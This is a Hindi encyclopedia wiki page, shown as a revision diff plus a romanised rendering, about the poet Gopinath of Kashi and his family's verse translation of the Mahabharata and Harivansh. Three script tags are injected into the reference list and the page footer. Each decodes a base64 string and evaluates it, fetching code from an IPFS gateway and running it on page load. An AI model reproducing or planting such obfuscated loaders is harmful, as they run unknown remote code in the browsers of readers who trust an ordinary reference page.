Difference between revisions of "गोपीनाथ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[गोकुलनाथ]], गोपीनाथ और [[मणिदेव]] इन तीनों महानुभावों ने मिलकर [[हिन्दी साहित्य]] में बड़ा भारी काम किया है। इन्होंने समग्र [[महाभारत]] और [[हरिवंश पुराण|हरिवंश]]<ref> जो महाभारत का ही परिशिष्ट माना जाता है</ref> का अनुवाद अत्यंत मनोहर विविधा [[छंद|छंदों]] में पूर्ण कवित्त के साथ किया है। कथा प्रबंध का इतना बड़ा काव्य हिन्दी साहित्य में दूसरा नहीं बना। [[भाषा]] प्रांजल और सुव्यवस्थित है। अनुप्रास का अधिक आग्रह न होने पर भी आवश्यक विधान है। रचना सब प्रकार से साहित्यिक और मनोहर है और लेखकों की काव्यकुशलता का परिचय देती है। इस ग्रंथ के बनने में भी पचास वर्ष से ऊपर लगे हैं। अनुमानत: इसका आरंभ संवत् 1830 में हो चुका था और संवत् 1884 में जाकर समाप्त हुआ है। इसकी रचना काशीनरेश महाराज उदितनारायण सिंह की आज्ञा से हुई जिन्होंने इसके लिए लाखों रुपये व्यय किए। इस बड़े भारी साहित्यिक यज्ञ के अनुष्ठान के लिए हिन्दी प्रेमी उक्त महाराज के सदा कृतज्ञ रहेंगे।
+
'''गोपीनाथ''' [[काशी]] के [[चेतसिंह|महाराज चेतसिंह]] के दरबारी [[कवि]] [[गोकुलनाथ]] के पुत्र तथा [[रघुनाथ बंदीजन]] के पौत्र थे। गोपीनाथ ने भी 'महाभारत दर्पण' के '[[भीष्मपर्व महाभारत|भीष्मपर्व]]', '[[द्रोणपर्व महाभारत|द्रोणपर्व]]', '[[स्वर्गारोहणपर्व महाभारत|स्वर्गारोहणपर्व]]', '[[शांतिपर्व महाभारत|शांतिपर्व]]' तथा '[[हरिवंशपुराण]]' का अनुवाद किया था। ये राजा उदित नारायण सिंह के आश्रित कवि थे।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0/ |title=काशी कथा, साहित्यकार|accessmonthday= 10 जनवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 +
==योगदान==
 +
[[गोकुलनाथ]], गोपीनाथ और [[मणिदेव]]- इन तीनों महानुभावों ने मिलकर [[हिन्दी साहित्य]] में बड़ा भारी काम किया है। इन्होंने समग्र [[महाभारत]] और [[हरिवंश पुराण|हरिवंश]]<ref> जो महाभारत का ही परिशिष्ट माना जाता है</ref> का अनुवाद अत्यंत मनोहर विविधा [[छंद|छंदों]] में पूर्ण [[कवित्त]] के साथ किया है। कथा प्रबंध का इतना बड़ा काव्य हिन्दी साहित्य में दूसरा नहीं बना। [[भाषा]] प्रांजल और सुव्यवस्थित है। [[अनुप्रास अलंकार|अनुप्रास]] का अधिक आग्रह न होने पर भी आवश्यक विधान है। रचना सब प्रकार से साहित्यिक और मनोहर है और लेखकों की काव्य कुशलता का परिचय देती है। इस ग्रंथ के बनने में भी पचास [[वर्ष]] से ऊपर लगे हैं। अनुमानत: इसका आरंभ [[संवत्]] 1830 में हो चुका था और संवत् 1884 में जाकर समाप्त हुआ है। इसकी रचना [[काशी]] नरेश महाराज उदित नारायण सिंह की आज्ञा से हुई, जिन्होंने इसके लिए लाखों रुपये व्यय किए। इस बड़े भारी साहित्यिक यज्ञ के अनुष्ठान के लिए [[हिन्दी]] प्रेमी उक्त महाराज के सदा कृतज्ञ रहेंगे।
  
 
[[गोकुलनाथ]] और गोपीनाथ प्रसिद्ध कवि [[रघुनाथ बंदीजन]] के पुत्र और पौत्र थे।  
 
[[गोकुलनाथ]] और गोपीनाथ प्रसिद्ध कवि [[रघुनाथ बंदीजन]] के पुत्र और पौत्र थे।  
Line 7: Line 9:
 
एक भीषम सहस सम रन जुरो हो तहँ जोर</poem>
 
एक भीषम सहस सम रन जुरो हो तहँ जोर</poem>
  
 
+
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
{{cite book | last =आचार्य| first =रामचंद्र शुक्ल| title =हिन्दी साहित्य का इतिहास| edition =| publisher =कमल प्रकाशन, नई दिल्ली| location =भारतडिस्कवरी पुस्तकालय | language =हिन्दी | pages =पृष्ठ सं. 253| chapter =प्रकरण 3}}
 
{{cite book | last =आचार्य| first =रामचंद्र शुक्ल| title =हिन्दी साहित्य का इतिहास| edition =| publisher =कमल प्रकाशन, नई दिल्ली| location =भारतडिस्कवरी पुस्तकालय | language =हिन्दी | pages =पृष्ठ सं. 253| chapter =प्रकरण 3}}
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{भारत के कवि}}
 
{{भारत के कवि}}
[[Category:कवि]]  
+
[[Category:कवि]] [[Category:रीति_काल]][[Category:रीतिकालीन कवि]]
[[Category:रीति_काल]]
+
[[Category:चरित कोश]] [[Category:साहित्य कोश]]
[[Category:रीतिकालीन कवि]]
 
[[Category:चरित कोश]]  
 
[[Category:साहित्य कोश]]
 
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 06:38, 10 January 2014

gopinath kashi ke maharaj chetasianh ke darabari kavi gokulanath ke putr tatha raghunath bandijan ke pautr the. gopinath ne bhi 'mahabharat darpan' ke 'bhishmaparv', 'dronaparv', 'svargarohanaparv', 'shaantiparv' tatha 'harivanshapuran' ka anuvad kiya tha. ye raja udit narayan sianh ke ashrit kavi the.[1]

yogadan

gokulanath, gopinath aur manidev- in tinoan mahanubhavoan ne milakar hindi sahity mean b da bhari kam kiya hai. inhoanne samagr mahabharat aur harivansh[2] ka anuvad atyant manohar vividha chhandoan mean poorn kavitt ke sath kiya hai. katha prabandh ka itana b da kavy hindi sahity mean doosara nahian bana. bhasha praanjal aur suvyavasthit hai. anupras ka adhik agrah n hone par bhi avashyak vidhan hai. rachana sab prakar se sahityik aur manohar hai aur lekhakoan ki kavy kushalata ka parichay deti hai. is granth ke banane mean bhi pachas varsh se oopar lage haian. anumanat: isaka aranbh sanvath 1830 mean ho chuka tha aur sanvath 1884 mean jakar samapt hua hai. isaki rachana kashi naresh maharaj udit narayan sianh ki ajna se huee, jinhoanne isake lie lakhoan rupaye vyay kie. is b de bhari sahityik yajn ke anushthan ke lie hindi premi ukt maharaj ke sada kritajn raheange.

gokulanath aur gopinath prasiddh kavi raghunath bandijan ke putr aur pautr the.

sarv disi mean phirat bhisham ko surath man man.
lakhe sab kou tahaan bhoop alatachakr saman
sarv thar sab rathin soan tehi samay nrip sab or.
ek bhisham sahas sam ran juro ho tahan jor


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. kashi katha, sahityakar (hindi). . abhigaman tithi: 10 janavari, 2014.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. jo mahabharat ka hi parishisht mana jata hai

achary, ramachandr shukl “prakaran 3”, hindi sahity ka itihas (hindi). bharatadiskavari pustakalay: kamal prakashan, nee dilli, prishth san. 253.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>